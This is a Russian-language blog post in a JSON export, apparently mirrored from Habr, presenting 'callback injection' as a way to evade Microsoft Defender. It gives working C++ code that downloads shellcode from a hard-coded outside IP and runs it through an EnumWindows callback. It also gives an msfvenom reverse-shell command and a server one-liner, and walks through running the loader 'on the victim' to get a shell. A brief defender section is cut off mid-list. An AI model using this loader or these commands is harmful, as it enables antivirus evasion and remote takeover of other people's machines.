{"id":476051,"date":"2026-04-15T12:39:52","date_gmt":"2026-04-15T12:39:52","guid":{"rendered":"https:\/\/savepearlharbor.com\/?p=476051"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=476051","title":{"rendered":"Callback Injection: \u0422\u0435\u0445\u043d\u0438\u043a\u0430, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u043b\u0430 Microsoft Defender \u0432 \u0433\u043b\u0443\u0445\u043e\u0439 \u043d\u043e\u043a\u0430\u0443\u0442"},"content":{"rendered":"<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\n<h3>\ud83d\udccc \u041e\u0433\u043b\u0430\u0432\u043b\u0435\u043d\u0438\u0435<\/h3>\n<ol>\n<li>\n<p>\u0412\u0432\u0435\u0434\u0435\u043d\u0438\u0435: \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043a\u043b\u0430\u0441\u0441\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438<\/p>\n<\/li>\n<li>\n<p>\u0427\u0442\u043e \u0442\u0430\u043a\u043e\u0435 Callback Injection<\/p>\n<\/li>\n<li>\n<p>\u041f\u043e\u0447\u0435\u043c\u0443 \u044d\u0442\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043f\u0440\u043e\u0442\u0438\u0432 Defender<\/p>\n<\/li>\n<li>\n<p>\u041f\u043e\u043b\u043d\u044b\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u0442\u0435\u0445\u043d\u0438\u043a\u0438 (\u0441 \u043a\u043e\u0434\u043e\u043c)<\/p>\n<\/li>\n<li>\n<p>\u0414\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u044f \u0440\u0430\u0431\u043e\u0442\u044b<\/p>\n<\/li>\n<li>\n<p>\u041a\u0430\u043a \u0437\u0430\u0449\u0438\u0442\u0438\u0442\u044c\u0441\u044f<\/p>\n<\/li>\n<li>\n<p>\u0417\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435<\/p>\n<\/li>\n<\/ol>\n<h3>1. \u0412\u0432\u0435\u0434\u0435\u043d\u0438\u0435<\/h3>\n<p>\u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u044c\u0442\u0435 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044e: \u0432\u044b \u043d\u0430 \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u0435, \u0443 \u0432\u0430\u0441 \u0435\u0441\u0442\u044c \u0448\u0435\u043b\u043b\u043a\u043e\u0434, \u043d\u043e Windows Defender \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442 <strong>\u043b\u044e\u0431\u043e\u0439<\/strong> \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0432\u044b\u0437\u043e\u0432. <code>CreateRemoteThread<\/code> \u2014 \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0442\u0441\u044f. <code>QueueUserAPC<\/code> \u2014 \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0442\u0441\u044f. <code>NtCreateThreadEx<\/code> \u2014 \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0442\u0441\u044f.<\/p>\n<p><strong>\u0427\u0442\u043e \u0434\u0435\u043b\u0430\u0442\u044c?<\/strong><\/p>\n<p>\u041e\u0442\u0432\u0435\u0442: <strong>\u043d\u0435 \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u043f\u043e\u0442\u043e\u043a\u0438 \u0441\u0430\u043c\u043e\u043c\u0443, \u0430 \u043f\u043e\u043f\u0440\u043e\u0441\u0438\u0442\u044c Windows \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u044d\u0442\u043e \u0437\u0430 \u0432\u0430\u0441.<\/strong><\/p>\n<p>Callback Injection &#8212; \u044d\u0442\u043e \u0442\u0435\u0445\u043d\u0438\u043a\u0430, \u043f\u0440\u0438 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0432\u044b \u00ab\u043e\u0434\u0430\u043b\u0436\u0438\u0432\u0430\u0435\u0442\u0435\u00bb \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u0439 \u043f\u043e\u0442\u043e\u043a Windows, \u0437\u0430\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u0435\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0432\u0430\u0448 \u043a\u043e\u0434 \u0447\u0435\u0440\u0435\u0437 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 callback-\u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u044b.<\/p>\n<h3>2. \u0427\u0442\u043e \u0442\u0430\u043a\u043e\u0435 Callback Injection<\/h3>\n<p><strong>Callback<\/strong> &#8212; \u044d\u0442\u043e \u0444\u0443\u043d\u043a\u0446\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u0432\u044b \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442\u0435 Windows, \u0447\u0442\u043e\u0431\u044b \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u0432\u044b\u0437\u0432\u0430\u043b\u0430 \u0435\u0451 \u043f\u0440\u0438 \u043d\u0430\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0441\u043e\u0431\u044b\u0442\u0438\u044f.<\/p>\n<p>Windows \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 <strong>\u0441\u043e\u0442\u043d\u0438<\/strong> callback-\u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u0432:<\/p>\n<ul>\n<li>\n<p><code>EnumWindows<\/code> \u2014 \u0434\u043b\u044f \u043f\u0435\u0440\u0435\u0431\u043e\u0440\u0430 \u043e\u043a\u043e\u043d<\/p>\n<\/li>\n<li>\n<p><code>EnumChildWindows<\/code> \u2014 \u0434\u043b\u044f \u0434\u043e\u0447\u0435\u0440\u043d\u0438\u0445 \u043e\u043a\u043e\u043d<\/p>\n<\/li>\n<li>\n<p><code>EnumFonts<\/code> \u2014 \u0434\u043b\u044f \u043f\u0435\u0440\u0435\u0431\u043e\u0440\u0430 \u0448\u0440\u0438\u0444\u0442\u043e\u0432<\/p>\n<\/li>\n<li>\n<p><code>SetTimer<\/code> \u2014 \u0434\u043b\u044f \u0442\u0430\u0439\u043c\u0435\u0440\u043e\u0432<\/p>\n<\/li>\n<li>\n<p><code>SetWinEventHook<\/code> \u2014 \u0434\u043b\u044f \u0441\u043e\u0431\u044b\u0442\u0438\u0439<\/p>\n<\/li>\n<li>\n<p>\u0418 \u043c\u043d\u043e\u0433\u0438\u0435 \u0434\u0440\u0443\u0433\u0438\u0435\u2026<\/p>\n<\/li>\n<\/ul>\n<p>\u0418\u0434\u0435\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0432\u044b:<\/p>\n<ol>\n<li>\n<p>\u0412\u044b\u0434\u0435\u043b\u044f\u0435\u0442\u0435 \u043f\u0430\u043c\u044f\u0442\u044c \u0441 \u0448\u0435\u043b\u043b\u043a\u043e\u0434\u043e\u043c<\/p>\n<\/li>\n<li>\n<p>\u041c\u0435\u043d\u044f\u0435\u0442\u0435 \u0437\u0430\u0449\u0438\u0442\u0443 \u043d\u0430 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u0443\u044e<\/p>\n<\/li>\n<li>\n<p>\u041f\u0435\u0440\u0435\u0434\u0430\u0451\u0442\u0435 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u043d\u0430 \u0448\u0435\u043b\u043b\u043a\u043e\u0434 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 <code>lParam<\/code><\/p>\n<\/li>\n<li>\n<p>\u0412 callback&#8217;\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0435 \u0435\u0433\u043e<\/p>\n<\/li>\n<\/ol>\n<p><strong>Windows \u0441\u0430\u043c\u0430 \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u0432\u0430\u0448 \u043a\u043e\u0434 \u0432 \u0441\u0432\u043e\u0451\u043c \u043f\u043e\u0442\u043e\u043a\u0435.<\/strong><\/p>\n<h3>3. \u041f\u043e\u0447\u0435\u043c\u0443 \u044d\u0442\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043f\u0440\u043e\u0442\u0438\u0432 Defender<\/h3>\n<p><strong>\u041f\u043e\u0447\u0435\u043c\u0443 <\/strong><code><strong>EnumWindows<\/strong><\/code><strong> \u043d\u0435 \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0442\u0441\u044f?<\/strong><\/p>\n<ol>\n<li>\n<p><code>EnumWindows<\/code> &#8212; \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u0430\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0430\u044f \u0442\u044b\u0441\u044f\u0447\u0430\u043c\u0438 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439<\/p>\n<\/li>\n<li>\n<p>Callback \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432\u043d\u0443\u0442\u0440\u0438 <code>ntdll!ZwEnumerateWindows<\/code>, \u0447\u0442\u043e \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043a\u0430\u043a \u043e\u0431\u044b\u0447\u043d\u044b\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0439 \u0432\u044b\u0437\u043e\u0432<\/p>\n<\/li>\n<li>\n<p>EDR \u0440\u0435\u0434\u043a\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u044e\u0442, <em>\u0447\u0442\u043e \u0438\u043c\u0435\u043d\u043d\u043e<\/em> \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0432 callback&#8217;\u0435<\/p>\n<\/li>\n<\/ol>\n<h3>4. \u041f\u043e\u043b\u043d\u044b\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u0442\u0435\u0445\u043d\u0438\u043a\u0438 (\u0441 \u043a\u043e\u0434\u043e\u043c)<\/h3>\n<h4>\u0428\u0430\u0433 1: \u0421\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u043c \u0448\u0435\u043b\u043b\u043a\u043e\u0434 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u0430<\/h4>\n<pre><code>std::vector&lt;BYTE&gt; DownloadFile(const wchar_t* server, int port, const wchar_t* path) {    HINTERNET hSession = WinHttpOpen(L\"WinHTTP\/1.0\", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,                                       WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);    HINTERNET hConnect = WinHttpConnect(hSession, server, port, 0);    HINTERNET hRequest = WinHttpOpenRequest(hConnect, L\"GET\", path, NULL,                                              WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, 0);        WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0,                        WINHTTP_NO_REQUEST_DATA, 0, 0, 0);    WinHttpReceiveResponse(hRequest, NULL);        std::vector&lt;BYTE&gt; result;    BYTE buffer[4096];    DWORD bytesRead;    while (WinHttpReadData(hRequest, buffer, sizeof(buffer), &amp;bytesRead) &amp;&amp; bytesRead &gt; 0) {        result.insert(result.end(), buffer, buffer + bytesRead);    }        WinHttpCloseHandle(hRequest);    WinHttpCloseHandle(hConnect);    WinHttpCloseHandle(hSession);        return result;}<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:87px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<h4>\u0428\u0430\u0433 2: Callback-\u0444\u0443\u043d\u043a\u0446\u0438\u044f<\/h4>\n<pre><code>BOOL CALLBACK InjectionCallback(HWND hwnd, LPARAM lParam) {    \/\/ lParam \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u043d\u0430 \u043d\u0430\u0448 \u0448\u0435\u043b\u043b\u043a\u043e\u0434    void (*shellcode)() = (void(*)())lParam;        \/\/ \u0412\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c!    shellcode();        \/\/ \u041e\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u043c \u043f\u0435\u0440\u0435\u0431\u043e\u0440 \u043f\u043e\u0441\u043b\u0435 \u043f\u0435\u0440\u0432\u043e\u0433\u043e \u043e\u043a\u043d\u0430    return FALSE;}<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<h4>\u0428\u0430\u0433 3: \u041e\u0441\u043d\u043e\u0432\u043d\u0430\u044f \u043b\u043e\u0433\u0438\u043a\u0430<\/h4>\n<pre><code>int main() {    \/\/ 1. \u0421\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u043c \u0448\u0435\u043b\u043b\u043a\u043e\u0434    auto shellcode = DownloadFile(L\"31.44.0.193\", 8080, L\"\/payload.bin\");        \/\/ 2. \u0412\u044b\u0434\u0435\u043b\u044f\u0435\u043c \u043f\u0430\u043c\u044f\u0442\u044c    LPVOID pMemory = VirtualAlloc(NULL, shellcode.size(),                                    MEM_COMMIT | MEM_RESERVE,                                    PAGE_READWRITE);        \/\/ 3. \u041a\u043e\u043f\u0438\u0440\u0443\u0435\u043c    memcpy(pMemory, shellcode.data(), shellcode.size());        \/\/ 4. \u041c\u0435\u043d\u044f\u0435\u043c \u0437\u0430\u0449\u0438\u0442\u0443 \u043d\u0430 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u0443\u044e    DWORD oldProtect;    VirtualProtect(pMemory, shellcode.size(), PAGE_EXECUTE_READWRITE, &amp;oldProtect);        \/\/ 5. \u0417\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u0447\u0435\u0440\u0435\u0437 callback    EnumWindows((WNDENUMPROC)InjectionCallback, (LPARAM)pMemory);        \/\/ 6. \u041e\u0447\u0438\u0441\u0442\u043a\u0430 (\u0441\u044e\u0434\u0430 \u043d\u0435 \u0434\u043e\u0445\u043e\u0434\u0438\u043c, \u0435\u0441\u043b\u0438 \u0448\u0435\u043b\u043b\u043a\u043e\u0434 \u0443\u0441\u043f\u0435\u0448\u0435\u043d)    VirtualFree(pMemory, 0, MEM_RELEASE);        return 0;}<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<h4>\u0427\u0442\u043e \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u043f\u043e\u0434 \u043a\u0430\u043f\u043e\u0442\u043e\u043c?<\/h4>\n<pre><code>1. VirtualAlloc \u2192 \u0432\u044b\u0434\u0435\u043b\u044f\u0435\u0442 \u043f\u0430\u043c\u044f\u0442\u044c (PAGE_READWRITE)2. memcpy \u2192 \u043a\u043e\u043f\u0438\u0440\u0443\u0435\u0442 \u0448\u0435\u043b\u043b\u043a\u043e\u04343. VirtualProtect \u2192 \u043c\u0435\u043d\u044f\u0435\u0442 \u0437\u0430\u0449\u0438\u0442\u0443 \u043d\u0430 PAGE_EXECUTE_READWRITE4. EnumWindows \u2192 \u043f\u0435\u0440\u0435\u0431\u0438\u0440\u0430\u0435\u0442 \u0432\u0441\u0435 \u043e\u043a\u043d\u0430, \u0432\u044b\u0437\u044b\u0432\u0430\u044f \u0432\u0430\u0448 callback5. Callback \u2192 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0448\u0435\u043b\u043b\u043a\u043e\u04346. \u0428\u0435\u043b\u043b\u043a\u043e\u0434 \u2192 \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, reverse shell<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p><strong>\u0412\u0430\u0436\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442:<\/strong> \u041a\u043e\u0434 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f <strong>\u0432 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0435 \u043f\u043e\u0442\u043e\u043a\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u044b\u0437\u0432\u0430\u043b <\/strong><code><strong>EnumWindows<\/strong><\/code>. \u042d\u0442\u043e \u043f\u043e\u0442\u043e\u043a \u0432\u0430\u0448\u0435\u0433\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0448\u0435\u043b\u043b\u043a\u043e\u0434 \u0431\u0443\u0434\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c\u0441\u044f \u0441 \u0442\u0435\u043c\u0438 \u0436\u0435 \u043f\u0440\u0430\u0432\u0430\u043c\u0438, \u0447\u0442\u043e \u0438 \u0432\u0430\u0448\u0430 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430.<\/p>\n<h2>5. \u0414\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u044f \u0440\u0430\u0431\u043e\u0442\u044b<\/h2>\n<ol>\n<li>\n<p>\u041f\u043e\u0434\u0433\u043e\u0442\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u043c \u043d\u0430\u0448\u0443 \u0442\u0435\u0441\u0442\u0438\u0440\u0443\u0435\u043c\u0443\u044e \u043c\u0430\u0448\u0438\u043d\u0443 (\u0432\u043a\u043b\u044e\u0447\u0430\u0435\u043c \u0432\u0441\u0435 \u0447\u0442\u043e \u0435\u0441\u0442\u044c \u0432 \u0437\u0430\u0449\u0438\u0442\u043d\u0438\u043a\u0435)<\/p>\n<\/li>\n<\/ol>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/3dd\/576\/cca\/3dd576cca9f780e27ac033b2209dd39b.png\" alt=\"\u0414\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u044f \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0433\u043e Defender\" title=\"\u0414\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u044f \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0433\u043e Defender\" width=\"1674\" height=\"942\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/3dd\/576\/cca\/3dd576cca9f780e27ac033b2209dd39b.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/3dd\/576\/cca\/3dd576cca9f780e27ac033b2209dd39b.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0414\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u044f \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0433\u043e Defender<\/figcaption><\/div>\n<\/figure>\n<p>2. \u041f\u043e\u0434\u0433\u043e\u0442\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u043c \u043d\u0430\u0448 shellcode \u0438 \u043f\u043e\u0434\u043d\u0438\u043c\u0430\u0435\u043c \u0441\u0435\u0440\u0432\u0435\u0440 \u043d\u0430 VPS <\/p>\n<pre><code class=\"bash\">msfvenom -p windows\/x64\/shell_reverse_tcp LHOST=ip LPORT=4444 -f raw -o shellcode.binpython3 -m http.server 8080<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/cce\/ff0\/096\/cceff0096894cd661ed26d8aa32a5e16.png\" alt=\"\u0413\u0435\u043d\u0435\u0440\u0438\u0440\u0443\u0435\u043c shellcode \u0438 \u043f\u043e\u0434\u043d\u0438\u043c\u0430\u0435\u043c \u0441\u0435\u0440\u0432\u0435\u0440\" title=\"\u0413\u0435\u043d\u0435\u0440\u0438\u0440\u0443\u0435\u043c shellcode \u0438 \u043f\u043e\u0434\u043d\u0438\u043c\u0430\u0435\u043c \u0441\u0435\u0440\u0432\u0435\u0440\" width=\"844\" height=\"272\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/cce\/ff0\/096\/cceff0096894cd661ed26d8aa32a5e16.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/cce\/ff0\/096\/cceff0096894cd661ed26d8aa32a5e16.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0413\u0435\u043d\u0435\u0440\u0438\u0440\u0443\u0435\u043c shellcode \u0438 \u043f\u043e\u0434\u043d\u0438\u043c\u0430\u0435\u043c \u0441\u0435\u0440\u0432\u0435\u0440<\/figcaption><\/div>\n<\/figure>\n<p>3. \u041c\u0435\u043d\u044f\u0435\u043c \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u0432 \u043a\u043e\u0434\u0435<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/85c\/8f2\/e83\/85c8f2e839f56a20fa4949768386f13c.png\" alt=\"\u041f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0430\u0434\u043e \u0438\u0437\u043c\u0435\u043d\u0438\u0442\u044c \u043d\u0430 \u0432\u0430\u0448 IP\/PORT\" title=\"\u041f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0430\u0434\u043e \u0438\u0437\u043c\u0435\u043d\u0438\u0442\u044c \u043d\u0430 \u0432\u0430\u0448 IP\/PORT\" width=\"497\" height=\"113\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/85c\/8f2\/e83\/85c8f2e839f56a20fa4949768386f13c.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/85c\/8f2\/e83\/85c8f2e839f56a20fa4949768386f13c.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u041f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0430\u0434\u043e \u0438\u0437\u043c\u0435\u043d\u0438\u0442\u044c \u043d\u0430 \u0432\u0430\u0448 IP\/PORT<\/figcaption><\/div>\n<\/figure>\n<p>\u0415\u0441\u043b\u0438 \u0434\u043b\u044f \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0431\u0443\u0434\u0435\u0442\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043c\u043e\u0439 \u043a\u043e\u0434 \u0442\u043e \u043d\u0430\u0434\u043e \u0438\u0437\u043c\u0435\u043d\u0438\u0442\u044c \u044d\u0442\u0438 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u043d\u0430 \u0432\u0430\u0448\u0438<\/p>\n<p>4. \u0417\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c exploit\/multi\/handler \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0448\u0435\u043b\u043b\u0430<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/73e\/382\/a77\/73e382a779bbe0ef35c37bf09c69fea3.png\" alt=\"\u041d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a exploit\/multi\/handler\" title=\"\u041d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a exploit\/multi\/handler\" width=\"797\" height=\"903\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/73e\/382\/a77\/73e382a779bbe0ef35c37bf09c69fea3.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/73e\/382\/a77\/73e382a779bbe0ef35c37bf09c69fea3.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u041d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a exploit\/multi\/handler<\/figcaption><\/div>\n<\/figure>\n<p>5. \u0417\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u043d\u0430 \u0436\u0435\u0440\u0442\u0432\u0435 \u043d\u0430\u0448 \u043a\u043e\u0434 \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0448\u0435\u043b\u043b!<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/7fe\/396\/6f9\/7fe3966f9fb7e8d9235d318f1f868731.png\" alt=\"PROFIT!\" title=\"PROFIT!\" width=\"1901\" height=\"1058\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/7fe\/396\/6f9\/7fe3966f9fb7e8d9235d318f1f868731.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/7fe\/396\/6f9\/7fe3966f9fb7e8d9235d318f1f868731.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>PROFIT!<\/figcaption><\/div>\n<\/figure>\n<h3>6. \u041a\u0430\u043a \u0437\u0430\u0449\u0438\u0442\u0438\u0442\u044c\u0441\u044f<\/h3>\n<p>\u0414\u043b\u044f \u0437\u0430\u0449\u0438\u0442\u043d\u0438\u043a\u043e\u0432:<\/p>\n<ol>\n<li>\n<p><strong>\u041c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u0442\u044c \u0432\u044b\u0437\u043e\u0432\u044b <\/strong><code><strong>VirtualProtect<\/strong><\/code> \u0441 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435\u043c \u0437\u0430\u0449\u0438\u0442\u044b \u043d\u0430 <code>PAGE_EXECUTE_READWRITE<\/code><\/p>\n<\/li>\n<li>\n<p><strong>\u0410\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c callback-\u0444\u0443\u043d\u043a\u0446\u0438\u0438<\/strong> \u2014 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c, \u043d\u0435 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043b\u0438 <code>lParam<\/code> \u043d\u0430 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u0443\u044e \u043f\u0430\u043c\u044f\u0442\u044c<\/p>\n<\/li>\n<li>\n<p><strong>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c EDR \u0441 \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0447\u0435\u0441\u043a\u0438\u043c \u0430\u043d\u0430\u043b\u0438\u0437\u043e\u043c<\/strong> \u2014 CrowdStrike \u0438 Carbon Black \u0434\u0435\u0442\u0435\u043a\u0442\u044f\u0442 \u044d\u0442\u0443 \u0442\u0435\u0445\u043d\u0438\u043a\u0443 \u043d\u0430 \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0447\u0435\u0441\u043a\u043e\u043c \u0443\u0440\u043e\u0432\u043d\u0435<\/p>\n<\/li>\n<li>\n<p><strong>\u0412\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c 